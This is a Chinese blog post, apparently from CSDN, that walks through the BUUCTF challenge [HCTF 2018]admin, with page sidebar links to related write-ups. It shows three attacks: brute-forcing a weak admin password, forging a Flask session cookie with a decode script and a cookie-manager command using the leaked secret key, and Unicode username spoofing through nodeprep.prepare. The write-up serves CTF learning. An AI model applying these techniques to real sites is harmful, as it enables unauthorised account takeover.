[HCTF 2018]admin

最新推荐文章于 2023-01-17 14:37:36 发布
最新推荐文章于 2023-01-17 14:37:36 发布
阅读量2k 收藏 1
点赞数
分类专栏: buuctf 文章标签: web安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/124195084
版权

[HCTF 2018]admin

一进入页面,发现,在未登录的情况下,我们只能访问3个页面index、login、register

同时我们观察 index 下的源码,发现
在这里插入图片描述
you are not admin 提示我们要进行登录

登录admin
可以进行 弱密码破解、sql访问数据库查看密码
当然,如果没有密码也可以,利用csrf漏洞,跨站请求伪造,让服务器以为我们是 admin

先进行弱密码破解,使用burpsuite

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现密码是 123
登录,获得flag
在这里插入图片描述

使用 bp 进行弱密码破解 破解成功获取flag
.

尝试进行sql注入,发现对 单引号 双引号 空格进行过滤,没办法对前面的内容进行闭合 所以sql 注入失败
但是,本关就绝不可能仅仅只是考察 弱密码破解,我们还没有用到 register 页面
所以在本关可能就是在考察 csrf 让我们篡改 cookie值 伪造 admin
我们尝试使用该页面进行注册,看能否会有什么信息

在这里插入图片描述
观察页面和源代码我们是无法发现什么的

我们抓一下包,看看能否有什么发现,发现本关的突破口确实在 session 上

我们可以先了解下 session

当用户第一次请求服务器的时候,服务器根据用户提交的相关信息,创建对应的 Session。请求返回时 sessionid将作为唯一标识=信息,返回浏览器,同时 浏览器将 sessionid 存入到 cookie中,在用户第二次访问服务器的时候,浏览器会将sessionid发送给服务器,服务端根据 sessionid查找对应的session 如果找到 Session ,用户登录并执行后面操作。

flask中有一个session对象,它允许你在不同请求间存储特定用户的信息。

为了防止被不怀好意的黑客篡改,flask中的sessionid 和 token 相似 都存在签名。

正常来说,因为签名的存在,我们是无法轻易的篡改的

但在本关,因为而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的。

所以,本关的考察方向就呼之欲出了:利用flask session伪造来解题。

在这里 挂一篇大佬的 exp

#index.html
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
 
def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
 
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
 
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')
 
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')
 
    return session_json_serializer.loads(payload)
 
if __name__ == '__main__':
    s = "这里填入需要解密的session"
    print(decryption(s.encode()))

利用大佬的exp进行解密 我们获得的 sessionid

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S6nBtjti-1650010582282)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220415160548733.png)]

通过解密后的内容可以看到解密出来原来的内容,能看到很明显一个name字段正是我们之前注册的hcj账户,那只要改一下这个值,将其修改为admin,然后重新加密一下就可以了

加密脚本获取

直接使用脚本就可以获取加密的sessionid了
加密脚本获取

python3 ./flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'3ca4bd7cc2e28139e9e1962ea737e7c901883f0fbecb9a1df7f45c23b9816404c55626e5799bed5f3968a379e68559254211f490ff49b41bc8bb9ab93c6f5f4f', 'csrf_token': b'da5ebb2c1dfe93c9c1276b6428e8dcbdfa22e39e', 'image': b'YEfZ', 'name': 'admin', 'user_id': '10'}"

或者

python2 ./flask_session_cookie_manager2.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'3ca4bd7cc2e28139e9e1962ea737e7c901883f0fbecb9a1df7f45c23b9816404c55626e5799bed5f3968a379e68559254211f490ff49b41bc8bb9ab93c6f5f4f', 'csrf_token': b'da5ebb2c1dfe93c9c1276b6428e8dcbdfa22e39e', 'image': b'YEfZ', 'name': 'admin', 'user_id': '10'}"

在这里插入图片描述
将我们获得sessionid复制到 bp上
repeater 点击GO
在这里插入图片描述
获得 flag

还有一种方法,Unicode欺骗
是我查了博客才明白的
修改密码,创建用户,登录的时候都是用strlower()先将name转成小写
我们先了解下 strlower 函数

def strlower(username):
    username = nodeprep.prepare(username)
    return username

nodeprep.prepare的版本与当前版本相差过大
存在可能 漏洞

我们发现在使用nodeprep.prepare函数转换时过程如下:

ᴬᴰᴹᴵᴺ -> ADMIN -> admin

假如我们注册ᴬᴰᴹᴵᴺ用户,然后在用ᴬᴰᴹᴵᴺ用户登录,因为在login函数里使用了一次nodeprep.prepare函数,因此我们登录上去看到的用户名为ADMIN,此时我们再修改密码,又调用了一次nodeprep.prepare函数将name转换为admin,然后我们就可以改掉admin的密码,最后利用admin账号登录即可拿到flag。

hcjtn
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
CG-CTF——WP(WEB[三])
hahaha233330的博客
01-11 479
CG-CTF——WriteUp(三) 工具: ①Winhex:图片隐写工具,这个很好用。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明 WEB 24、SQL注入1 听说你也会注入? 题目地址 打开题目出现了一个登陆界面,已经给了密码,直接。 点击 S...
刷题之旅第3站,论剑场web21
cc菜的一批
01-18 222
论剑场web21,序列化漏洞,反序列化,PHP代码审计
not authorized on admin to execute command
热门推荐
呼呼
07-06 1万+
错误提示: 2018-07-06T10:25:37.656+0800 E QUERY [thread1] Error: listCollections failed: { "ok" : 0, "errmsg" : "not authorized on admin to execute command { listCollections: 1.0, filter: {},...
BUUCTF web admin (flask_session问题)
H4ppyD0g的博客
02-23 1360
检查源码,发现有注释<!-- you are not admin -->,应该是提示用admin账号登录。 两个功能,注册和登录,想到之前做过一个注册admin加空格的题,试了一下不成功。 然后老老实实注册一个普通用户 显示了自己的用户名,我们的目的因该是让自己的用户名变成admin才行。 change password只能修改自己账号的密码,没有漏洞。 post可能有xss漏洞,交...
web buuctf [HCTF 2018]admin1
weixin_44214568的博客
03-13 2837
查看首页源代码,有注释 <!-- you are not admin --> 考虑这道题很有可能是用admin或者伪造admin进行登录, 用admin进行登录,随便填写密码进不去,发现页面有注册选项,用admin注册提示已经被注册 方法一:burp爆破 进入登录界面,用户名输admin,密码随便填,抓包对密码进行爆破; 爆破之后,提示429和302,可以看一下429的response,提示的是太多请求的问题, 更改options中的选项 控制数据量,我因为正.
[HCTF 2018]admin (三种解法详细详解)
记录学习,一起进步
01-17 2241
[HCTF 2018]admin
BUUCTF学习笔记-admin
weixin_42271850的博客
03-18 3183
BUUCTF学习笔记-admin 时间:2020/03/17 考点:session欺骗、flask框架         首页中右键查看源代码,可以看到有一个提示。you are not admin,大概就能猜到这一题估计就是要使用admin的身份去登陆网站拿到flag。于是就使用账号admin密码123发现直接...
[BUUCTF][HCTF 2018]admin
cosmoslin的博客
11-16 1118
考点 flask session伪造 unicode欺骗 条件竞争 法一:flask session伪造 查看源码,提示you are not admin,猜测需要admin登录 注册登录,网站功能页面很多,依次查看源码,在change password界面发现源码 是一个flask框架,进入routes.py,看一下注册和登录部分的源码 @app.route('/register', methods = ['GET', 'POST']) def register(): if current_
2018手工更新FlatLab Admin Template
09-15
原来下载那个30分的,不是最新版的,浪费了时间,实在没办法就自己手工从官网下载,遂分享给大家
fastadmin事务管理系统
05-27
fastadmin事务管理系统
Ace Admin 前端框架
05-30
Ace Admin 前端框架
Ace Admin 2018.4最新版
04-17
Ace Admin 官网最新资源。比较好用的后台框架,推荐使用
canal-admin
最新发布
02-28
canal-admin
2018安恒杯12月月赛复现
Gard3nia的博客
03-02 888
前言 萌新因为种种原因没有做安恒12月的月赛题,正巧这几天发现复现,又学到了新知识! 正文 Web easy 题目index.php给出源码: &lt;?php @error_reporting(1); include 'flag.php'; class baby { public $file; function __toString() { ...
BUUCTF [HCTF 2018] admin
Senimo
12-10 938
BUUCTF [HCTF 2018] admin解法一:弱密码解法二:Flask伪造Session解法三:Unicode欺骗 考点: 弱密码 Flask伪造session Unicode欺骗 启动环境: 简洁的页面和一个菜单栏,菜单栏中包含登陆、注册功能 查看网页源码,发现提示: <!-- you are not admin --> 提示需要用admin用户登陆 解法一:弱密码 尝试使用admin登陆,密码123: 登陆成功,可以得到flag 首先注册正常的账户: test test
攻防世界 Bug
CyhDl666的博客
02-24 864
进入界面随便注册一个root账号 点击Manage 页面返回Sorry,You are not admin! 需要用 admin账号 注册发现该账号已经被注册过了 发现有一个Findpwd界面 可以重置密码 问题来了 我不知道admin账号的生日和地址 先尝试一下改自己前面申请的root账号 改一下密码试试 这里要一直抓包 改掉username为admin尝试了一下 依然是成功的 所以这里admin的账号的密码就被改了 用admin登录 进入manage界面有提示IP NOT allowed burp.
HCTF2018-admin
迷风小白
09-11 1万+
前言 在BUUCTF上看到这题存在三种解法,感觉比较经典,就想着来复现一下顺便学习一波。存在以下三种解法: flask session 伪造 unicode欺骗 条件竞争 审题 拿到题目发现一共就登录注册两个功能,随便注册一个test/test用户 登录之后查看源码发现提示<!-- you are not admin -->,根据提示和题目名估计要让我们登录admin用户就可以得...
admin
06-02
在 Django 中,`admin` 是一个应用程序,用于创建后台管理界面,方便管理员对网站的内容进行管理和维护。 在 Django 的后台管理界面中,管理员可以对网站的数据进行增删改查等操作,例如添加新的用户、编辑文章内容、上传图片等。这些操作都是通过 Django 的 `admin` 应用程序来实现的。 使用 `admin` 应用程序非常简单,只需要在应用程序的 `admin.py` 文件中定义数据模型的管理类,然后将其注册到 `admin` 中即可。例如,下面是一个简单的 `admin.py` 文件: ```python from django.contrib import admin from .models import Post @admin.register(Post) class PostAdmin(admin.ModelAdmin): list_display = ('title', 'pub_date', 'author') list_filter = ('pub_date', 'author') search_fields = ('title', 'content') ``` 在这个文件中,我们定义了一个名为 `PostAdmin` 的管理类,并将其注册到 `admin` 中。这个管理类用于管理名为 `Post` 的数据模型。我们还定义了一些属性,例如 `list_display`、`list_filter` 和 `search_fields`,用于控制在后台管理界面中显示哪些字段、哪些过滤器和哪些搜索框。 在执行 `python manage.py runserver` 命令启动开发服务器后,可以在浏览器中访问 `http://localhost:8000/admin/`,进入 Django 的后台管理界面。在这个界面中,我们可以看到所有已注册的数据模型,并可以对它们进行增删改查等操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值